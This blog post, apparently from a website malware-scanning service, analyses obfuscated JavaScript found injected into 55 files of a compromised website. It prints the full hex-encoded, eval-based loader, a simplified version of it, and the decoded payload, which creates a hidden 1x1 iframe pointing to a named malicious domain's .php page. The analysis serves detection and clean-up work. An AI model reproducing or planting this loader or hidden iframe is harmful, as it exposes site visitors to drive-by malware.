Obfuscated malicious JavaScript code that generates hidden iframe to remote .php file on blacklisted website
Background
Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor. This infected website hosts suspicious JavaScript code injected in 55 files. The suspicious initialization of function pointer to JavaScript String.fromCharCode method is used in all detected files. As discussed in other posts about malicious iframes generation, the attack flow is very similar and contains multiple levels of obfuscation to overcome the detection mechanisms.
Malicious action
Malicious iframes are often used to distribute malware hosted on external web resources(websites).
Website malware scanner report
Submission date: Wed Apr 24 01:11:34 2013
Infected website's files: 55
Malware entry
Malware entry details.
Beautified script
- p = parseInt;
- ss = (123) ? String.fromCharCode : 0;
- asgq ="28!66!75!6e!63!74!6#!6f!6e!20!28!2#!20!7b!d!a!20!20!20!20!76!61!72!20!71!78!74!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6#!66!72!61!6d!65!27!2#!3b!d!a!d!a!20!20!20!20!71!78!74!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!63!7#!62!65!72!73!62!6#!2e!63!6f!6d!2f!53!6#!64!65!53!6#!74!65!73!2f!63!6f!75!6e!74!2e!70!68!70!27!3b!d!a!20!20!20!20!71!78!74!2e!73!74!7#!6c!65!2e!70!6f!73!6#!74!6#!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!71!78!74!2e!73!74!7#!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!71!78!74!2e!73!74!7#!6c!65!2e!68!65!6#!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!71!78!74!2e!73!74!7#!6c!65!2e!77!6#!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!71!78!74!2e!73!74!7#!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!71!78!74!2e!73!74!7#!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6#!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7#!4#!64!28!27!71!78!74!27!2#!2#!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6#!74!65!28!27!3c!64!6#!76!20!6#!64!3d!5c!27!71!78!74!5c!27!3e!3c!2f!64!6#!76!3e!27!2#!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7#!4#!64!28!27!71!78!74!27!2#!2e!61!70!70!65!6e!64!43!68!6#!6c!64!28!71!78!74!2#!3b!d!a!20!20!20!20!7d!d!a!7d!2#!28!2#!3b".replace(/#/g,"9").split("!");
- try {
- document.body &= 0.1
- } catch (gdsgsdg) {
- zz = 3;
- dbshre = 226;
- if (dbshre) {
- vfvwe = 0;
- try {
- document;
- } catch (agdsg) {
- vfvwe = 1;
- }
- if (!vfvwe) {
- e = eval;
- }
- s = "";
- if (zz) for (i = 0; i - 477 != 0; i++) {
- if (window.document) s += ss(p(asgq[i], 16));
- }
- if (window.document) e(s);
- }
- }
Simplified version of threat
- asgq = "28!66!75!6e!63!74!6#!6f!6e!20!28!2#!20!7b!d!a!20!20!20!20!76!61!72!20!71!78!74!20!3d!20!64!6f!63!75!6d ... 5!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7#!4#!64!28!27!71!78!74!27!2#!2e!61!70!70!65!6e!64!43!68!6#!6c!64!28!71!78!74!2#!3b!d!a!20!20!20!20!7d!d!a!7d!2#!28!2#!3b".replace(/#/g,"9").split("!");
- s = "";
- for (i = 0; i - 477 != 0; i++) { s += String.fromCharCode(parseInt(asgq[i], 16)); }
- eval(s);
Malicious payload
Decoded payload generates hidden iframe to http://cybersbi[.]com/SideSites/count.php
- (function () {
- var qxt = document.createElement('iframe');
- qxt.src = 'http://cybersbi.com/SideSites/count.php';
- qxt.style.position = 'absolute';
- qxt.style.border = '0';
- qxt.style.height = '1px';
- qxt.style.width = '1px';
- qxt.style.left = '1px';
- qxt.style.top = '1px';
- if (!document.getElementById('qxt')) {
- document.write('<div id=\'qxt\'></div>');
- document.getElementById('qxt').appendChild(qxt);
- }
- })();
Blacklisting status
Google Safe Browsing analysis |
Malware clean-up
Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.
No comments:
Post a Comment